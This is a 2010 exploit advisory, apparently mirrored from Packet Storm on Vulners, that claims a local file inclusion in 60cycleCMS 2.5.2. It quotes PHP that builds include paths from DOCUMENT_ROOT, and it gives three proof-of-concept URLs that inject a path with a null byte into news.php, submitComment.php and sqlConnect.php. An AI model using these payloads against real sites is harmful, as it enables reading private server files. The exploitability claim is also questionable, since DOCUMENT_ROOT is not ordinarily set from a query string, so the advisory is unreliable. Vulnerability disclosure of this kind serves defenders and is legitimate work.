Lucene search
K

60cycleCMS 2.5.2 Local File Inclusion

🗓️ 14 Apr 2010 00:00:00Reported by eidelweissType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

60cycleCMS 2.5.2 Local File Inclusion vulnerability in PHP and MySQL CM

Code
`########################################################  
  
fucking the Web Apps [attack edition]  
  
____ __ __ __   
/\ _`\ /\ \ __ /\ \__/\ \   
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __   
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\  
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/  
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\  
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/  
/\____/   
\_/__/   
__ __ __ ______ By: eidelweiss  
/\ \ __/\ \ /\ \ /\ _ \   
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____   
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\  
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\  
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/  
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/  
\ \_\ \ \_\   
\/_/ \/_/   
  
  
[+]Title : 60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability  
[+]Version: 2.5.2  
[+]Download: http://php.opensourcecms.com/scripts/details.php?scriptid=337  
[+]License: New BSD (http://www.opensource.org/licenses/bsd-license.php)  
[+]Author: eidelweiss  
[+]Contact: eidelweiss[at]cyberservices[dot]com   
  
[!]Thank`s To: All Friends  
  
########################################################  
  
[!] Descriptsion  
  
60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written to power 60cycle.net.   
For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template.   
  
  
[!]-=[ Vuln C0de ]=-[!]  
  
[-] 60cycleCMS_path/news.php  
  
<?php  
  
require 'common/lib.php';  
$root = $_SERVER['DOCUMENT_ROOT'];  
require_once("$root/../config.php");  
  
  
  
[-] 60cycleCMS_path/submitComment.php  
  
<?php  
session_start();  
require_once('lib/recaptchalib.php');  
require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');  
$root = $_SERVER['DOCUMENT_ROOT'];  
require_once("$root/../config.php");  
  
  
[-] 60cycleCMS_path/common/sqlConnect.php  
  
<?php  
  
// include your sql info file here  
$root = $_SERVER['DOCUMENT_ROOT'];  
require "$root/../config.php";  
  
  
[!] -=[ Proof Of Concept ]=-[!]  
  
http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00  
http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00  
http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00  
  
########################################################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2010 00:00Current
7.4High risk
Vulners AI Score7.4
25